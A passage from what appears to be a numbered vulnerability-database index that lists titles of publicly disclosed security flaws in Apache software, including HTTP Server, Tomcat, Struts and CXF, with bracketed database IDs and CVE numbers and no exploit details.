5742| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
5743| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
5744| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
5745| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
5746| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
5747| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
5748| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
5749| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
5750| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
5751| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
5752| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
5753| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
5754| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
5755| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
5756| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
5757| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
5758| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
5759| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
5760| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
5761| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
5762| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
5763| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
5764| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
5765| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
5766| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
5767| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
5768| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
5769| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
5770| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
5771| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
5772| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
5773| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
5774| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
5775| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
5776| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
5777| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
5778| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
5779| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
5780| [68229] Apache Harmony PRNG Entropy Weakness
5781| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
5782| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
5783| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
5784| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
5785| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
5786| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
5787| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
5788| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
5789| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
5790| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
5791| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
5792| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
5793| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
5794| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
5795| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
5796| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
5797| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
5798| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
5799| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
5800| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
5801| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
5802| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
5803| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
5804| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
5805| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
5806| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
5807| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
5808| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
5809| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
5810| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
5811| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
5812| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
5813| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
5814| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
5815| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
5816| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
5817| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
5818| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
5819| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
5820| [64780] Apache CloudStack Unauthorized Access Vulnerability
5821| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
5822| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
5823| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
5824| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
5825| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
5826| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
5827| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
5828| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
5829| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
5830| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
5831| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
5832| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
5833| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
5834| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
5835| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
5836| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
5837| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
5838| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
5839| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
5840| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
5841| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
5842| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
5843| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
5844| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
5845| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
5846| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
5847| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
5848| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
5849| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
5850| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
5851| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
5852| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
5853| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
5854| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
5855| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
5856| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
5857| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
5858| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
5859| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
5860| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
5861| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
5862| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
5863| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
5864| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
5865| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
5866| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
5867| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
5868| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
5869| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
5870| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
5871| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
5872| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
5873| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
5874| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
5875| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
5876| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
5877| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
5878| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
5879| [59670] Apache VCL Multiple Input Validation Vulnerabilities
5880| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
5881| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
5882| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
5883| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
5884| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
5885| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
5886| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
5887| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
5888| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
5889| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
5890| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
5891| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
5892| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
5893| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
5894| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
5895| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
5896| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
5897| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
5898| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
5899| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
5900| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
5901| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
5902| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
5903| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
5904| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
5905| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
5906| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
5907| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
5908| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
5909| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
5910| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
5911| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
5912| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
5913| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
5914| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
5915| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
5916| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
5917| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
5918| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
5919| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
5920| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
5921| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
5922| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
5923| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
5924| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
5925| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
5926| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
5927| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
5928| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
5929| [54798] Apache Libcloud Man In The Middle Vulnerability
5930| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
5931| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
5932| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
5933| [54189] Apache Roller Cross Site Request Forgery Vulnerability
5934| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
5935| [53880] Apache CXF Child Policies Security Bypass Vulnerability
5936| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
5937| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
5938| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
5939| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
5940| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
5941| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
5942| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
5943| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
5944| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
5945| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
5946| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
5947| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
5948| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
5949| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
5950| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
5951| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
5952| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
5953| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
5954| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
5955| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
5956| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
5957| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
5958| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
5959| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
5960| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
5961| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
5962| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
5963| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
5964| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
5965| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
5966| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
5967| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
5968| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
5969| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
5970| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
5971| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
5972| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
5973| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
5974| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
5975| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
5976| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
5977| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
5978| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
5979| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
5980| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
5981| [49290] Apache Wicket Cross Site Scripting Vulnerability
5982| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
5983| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
5984| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
5985| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
5986| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
5987| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
5988| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
5989| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
5990| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
5991| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
5992| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
5993| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
5994| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
5995| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
5996| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
5997| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
5998| [46953] Apache MPM-ITK Module Security Weakness
5999| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
6000| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
6001| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
6002| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
6003| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
6004| [46166] Apache Tomcat JVM Denial of Service Vulnerability
6005| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
6006| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
6007| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
6008| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
6009| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
6010| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
6011| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
6012| [44616] Apache Shiro Directory Traversal Vulnerability
6013| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
6014| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
6015| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
6016| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
6017| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
6018| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
6019| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
6020| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
6021| [42492] Apache CXF XML DTD Processing Security Vulnerability
6022| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
6023| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
6024| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
6025| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
6026| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
6027| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
6028| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
6029| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
6030| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
6031| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
6032| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
6033| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
6034| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
6035| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
6036| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
6037| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
6038| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
6039| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
6040| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
6041| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
6042| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
6043| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
6044| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
6045| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
6046| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
6047| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
6048| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
6049| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
6050| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
6051| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
6052| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
6053| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
6054| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
6055| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
6056| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
6057| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6058| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
6059| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
6060| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
6061| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
6062| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
6063| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
6064| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
6065| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
6066| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
6067| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
6068| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
6069| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
6070| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
6071| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
6072| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
6073| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
6074| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
6075| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
6076| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
6077| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
6078| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
6079| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
6080| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
6081| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
6082| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6083| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
6084| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
6085| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
6086| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
6087| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
6088| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
6089| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
6090| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
6091| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
6092| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
6093| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
6094| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
6095| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
6096| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
6097| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
6098| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
6099| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
6100| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
6101| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
6102| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
6103| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
6104| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
6105| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
6106| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
6107| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
6108| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
6109| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
